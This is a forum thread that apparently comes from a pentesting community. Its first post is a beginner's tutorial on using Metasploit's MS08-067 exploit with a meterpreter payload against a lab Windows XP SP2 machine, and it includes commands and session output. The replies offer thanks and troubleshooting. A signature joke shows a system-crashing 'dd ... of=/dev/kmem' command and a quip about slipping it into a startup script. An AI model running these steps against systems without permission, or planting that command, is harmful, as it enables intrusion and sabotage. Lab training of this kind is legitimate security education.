Page 1 of 2 12 LastLast
Results 1 to 10 of 12

Thread: introduction to metasploit

  1. #1
    Junior Member
    Join Date
    Jan 2010
    Location
    /home
    Posts
    43

    Default introduction to metasploit

    This tutorial will give a basic introduction to metasploit.
    In the process, we'll also exploit a machine and run meterpreter on it.

    Everything that needs to be typed in console makes use of the code tag
    example:
    Code:
    msfconsole
    Also, I assume you have some basic understanding of networking and linux.
    WARNING, it is illegal to access a machine in any way that you do not have permission to access and it might get you in jail. I am not responsible for the actions you take. You have been warned.

    now on to the actual guide.

    requirements:
    backtrack 4 final
    non-patched windows xp sp2 box
    (confirmed that this does not work on xp sp3)
    some patience

    These are my ip's, make sure to change it to reflect your own settings
    attacker: 192.168.198.129
    victim: 192.168.198.130

    Ok, first things first, make sure that metasploit is updated.
    Code:
    /pentest/exploits/fasttrack/fast-track.py -i
    1 
    2

    Do a nmap scan to make sure there are some open ports (with hopefully vulnerable services)

    Code:
    nmap -v 192.168.198.130
    Nmap is done scanning and showed me 3 open ports. (if yours say filtered on all ports, try turning off any firewall)
    These are port 135, 139, 445.
    We're going to focus on port 445.
    A quick search on google shows us that port 445 is commonly used for smb.

    start up metasploit
    Code:
    msfconsole
    when its done loading,
    Code:
    show exploits windows
    We need an exploit for smb, so we need to choose one from smb folder. I used the ms08_067_netapi exploit.
    Code:
    use windows/smb/ms08_067_netapi
    Notice that after we typed this, msf > changed to msf exploit(ms08_067_netapi)>

    Great, so now we have an exploit, but what next?
    an exploit is useless without a payload, so
    Code:
    show payloads
    This will give us a list of payloads compatible with the exploit.
    We're going to use a meterpreter payload for this tutorial
    Code:
    set payload windows/meterpreter/bind_tcp
    now to configure it all
    Code:
    info
    set target 3
    set rhost 192.168.198.130
    target is the which windows version and service pack our victim is (our case xp sp2)
    though, you could also leave it how it is.
    rhost is the ip of the victim
    everything else can be default.
    if the payload was a reverse tcp, we would also need to set lhost
    lhost is the attackers ip.
    Code:
    exploit
    this is what we (should) get:
    [*] Started bind handler
    [*] Triggering the vulnerability...
    [*] Sending stage (723456 bytes)
    [*] Meterpreter session 1 opened (192.168.198.129:60087 -> 192.168.198.130:4444

    meterpreter >
    great! we're in!
    lets see what commands we got at our disposal
    Code:
    help
    under what username is meterpreter running?
    Code:
    getuid
    what processes are running?
    Code:
    ps
    and so we can go on and on about what we can do with meterpreter, but that is outside of the scope of this tutorial.

    hope this guide has been useful to someone, somewhere.

    for a more indepth guide to what metasploit can do, check this link.
    Metasploit Unleashed - Mastering the Framework
    Last edited by EcKo; 01-23-2010 at 04:30 AM. Reason: cleaning up.
    Aquillar> hey, you guys ever play kmem russian roulette?
    Agnostos> I don't believe I have. care to explain the details?
    Aquillar> dd if=/dev/urandom of=/dev/kmem bs=1 count=1 seek=$RANDOM
    Aquillar> keep executing until system crashes
    Aquillar> person that crashes system has to buy beer
    Agnostos> lol
    Agnostos> I wonder if I can sneak that into a server startup script here.

  2. #2
    Just burned his ISO
    Join Date
    Jan 2010
    Location
    127.0.0.1
    Posts
    16

    Default Re: introduction to metasploit

    Nice one, _EcKo

    Thank you.

    If anyone might want to learn more about metasploit, read here : Metasploit Unleashed - Mastering the Framework

  3. #3
    Junior Member
    Join Date
    Jan 2010
    Posts
    36

    Default Re: introduction to metasploit

    very good
    thnx for sharing

  4. #4
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    2

    Default Re: introduction to metasploit

    Good post, thanks! I'll have to try this out when I get back.

  5. #5
    Just burned his ISO
    Join Date
    Jan 2010
    Location
    south america
    Posts
    7

    Default Re: introduction to metasploit

    First at all: thanx!

    I have a little question... I used the option "set target 0" too, for an automatic test about so 'version' etc ... but this is the result:

    Code:
    msf exploit(ms08_067_netapi) > exploit
    [*] Started bind handler[*] Automatically detecting the target...[*] Fingerprint: Windows XP Service Pack 3 - lang:English[*] Selected Target: Windows XP SP3 English (NX)[*] Triggering the vulnerability...[*] Exploit completed, but no session was created.
    The firewall is off and the antivirus too... i am using vbox.
    Maybe the system is patched for this kind of exploits?

    In this case, it is possible to do something more with this exploit or can i consider this like a closed way?

    Thanx (and sorry for my strange english )

  6. #6
    Very good friend of the forum hhmatt's Avatar
    Join Date
    Jan 2010
    Posts
    660

    Default Re: introduction to metasploit

    Quote Originally Posted by reahel View Post
    First at all: thanx!

    I have a little question... I used the option "set target 0" too, for an automatic test about so 'version' etc ... but this is the result:

    Code:
    msf exploit(ms08_067_netapi) > exploit
    [*] Started bind handler[*] Automatically detecting the target...[*] Fingerprint: Windows XP Service Pack 3 - lang:English[*] Selected Target: Windows XP SP3 English (NX)[*] Triggering the vulnerability...[*] Exploit completed, but no session was created.
    The firewall is off and the antivirus too... i am using vbox.
    Maybe the system is patched for this kind of exploits?

    In this case, it is possible to do something more with this exploit or can i consider this like a closed way?

    Thanx (and sorry for my strange english )
    Your system is probably already patched against the ms08-067 vulnerability. It was published in Oct. 2008, here's the link.

  7. #7
    Member Mr-Protocol's Avatar
    Join Date
    Jan 2010
    Location
    Ohio
    Posts
    142

    Default Re: introduction to metasploit

    Here is a lot of information on metasploit from the folks at Offensive Security Metasploit Unleashed - Mastering the Framework Edit:: Whoops didn't see Linus1907 already posted it.
    I did a 45 minute presentation on that metasploit unleashed page and did most of the things on that page.

  8. #8
    Just burned his ISO
    Join Date
    Jan 2010
    Location
    south america
    Posts
    7

    Default Re: introduction to metasploit

    ...nothing to do... for ' my ' version of xp.
    But i am begin to understand how metasloit works... and i am happy for this.

    Thanx! The link is great! And this community really active!

  9. #9
    Very good friend of the forum hhmatt's Avatar
    Join Date
    Jan 2010
    Posts
    660

    Default Re: introduction to metasploit

    Quote Originally Posted by Mr-Protocol View Post
    Here is a lot of information on metasploit from the folks at Offensive Security Metasploit Unleashed - Mastering the Framework Edit:: Whoops didn't see Linus1907 already posted it.
    I did a 45 minute presentation on that metasploit unleashed page and did most of the things on that page.
    Definately worthy of mentioning. The Metasploit Unleashed course took me from maybesploit to megasploit in just 2 days.

    Good job aswell _EcKo Thanks.

  10. #10
    Just burned his ISO
    Join Date
    Jan 2010
    Location
    Melbourne, Australia
    Posts
    2

    Default Re: introduction to metasploit

    I wonder if this'll work with XP SP3.
    I'll definitely try it tonight.
    Cheers.

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •